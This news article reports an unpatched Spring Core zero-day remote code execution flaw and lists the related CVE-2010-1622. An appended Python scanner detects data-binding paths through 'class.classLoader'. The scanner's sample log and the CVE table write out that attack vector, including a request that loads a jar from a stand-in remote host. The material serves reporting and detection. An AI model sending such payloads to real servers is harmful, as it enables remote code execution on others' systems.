Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security
A zero-day remote code execution vulnerability has come to light in the Spring framework shortly after a Chinese security researcher briefly leaked a proof-of-concept exploit on GitHub before deleting their account.
According to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit versions 9 and later and is a bypass for another vulnerability tracked as CVE-2010-1622, enabling an unauthenticated attacker to execute arbitrary code on the target system.
Spring is a software framework for building Java applications, including web apps on top of the Java EE platform.
It's worth noting that the flaw targeted by the zero-day exploit is different from the two other vulnerabilities disclosed in the Spring framework this week, namely the Spring Framework expression DoS vulnerability and the Spring Cloud expression resource access vulnerability.
Initial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe.
"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous," Flashpoint said in an independent analysis.
News URL
https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html
Related Vulnerability
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2010-06-21 | CVE-2010-1622 | Code Injection vulnerability in multiple products: SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing `class.classLoader.URLs[0]=jar:` followed by a URL of a crafted .jar file. | 0.0 |
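As an added defensive example (not code from the article, Praetorian, Flashpoint or the Spring project): a small Python scanner that flags HTTP request parameters whose data-binding path walks through a `class` segment into a nested property such as `classLoader`, the vector named in the CVE-2010-1622 entry above. The access-log lines are constructed, and the only assumption is a common-log-format request line.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Binding-path segments that request data should never traverse. CVE-2010-1622
# abused "class.classLoader"; matching is case-insensitive so "Class" is caught.
FORBIDDEN_SEGMENTS = {"class", "classloader"}


def suspicious_params(query):
    """Return parameter names whose dotted/bracketed path traverses a forbidden segment.

    A bare "class=7" (no further segment) is a plain value, not a traversal,
    and is deliberately not flagged to limit false positives.
    """
    hits = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        # "class.classLoader.URLs[0]" -> ["class", "classLoader", "URLs", "0"]
        segments = [s for s in re.split(r"[.\[\]]+", name) if s]
        for i, seg in enumerate(segments[:-1]):  # must be followed by another segment
            if seg.lower() in FORBIDDEN_SEGMENTS:
                hits.append(name)
                break
    return hits


def scan_access_log(lines):
    """Return [(line_no, [param names])] for log lines whose request target binds a forbidden path."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST|PUT)\s+(\S+)', line)
        if not m:
            continue
        hits = suspicious_params(urlsplit(m.group(1)).query)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample log lines (not real traffic); line 2 mirrors the CVE-2010-1622 vector.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/Mar/2022:10:00:01 +0000] "GET /app/search?q=spring HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/Mar/2022:10:00:02 +0000] "POST /app/user?class.classLoader.URLs%5B0%5D=jar:http://example.invalid/x.jar%21/ HTTP/1.1" 400 0',
    '10.0.0.9 - - [31/Mar/2022:10:00:03 +0000] "GET /app/user?name=alice&Class.ClassLoader.urls%5B1%5D=x HTTP/1.1" 200 256',
    '10.0.0.7 - - [31/Mar/2022:10:00:04 +0000] "GET /app/grades?class=7&q=x HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for line_no, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious binding paths {hits}")
```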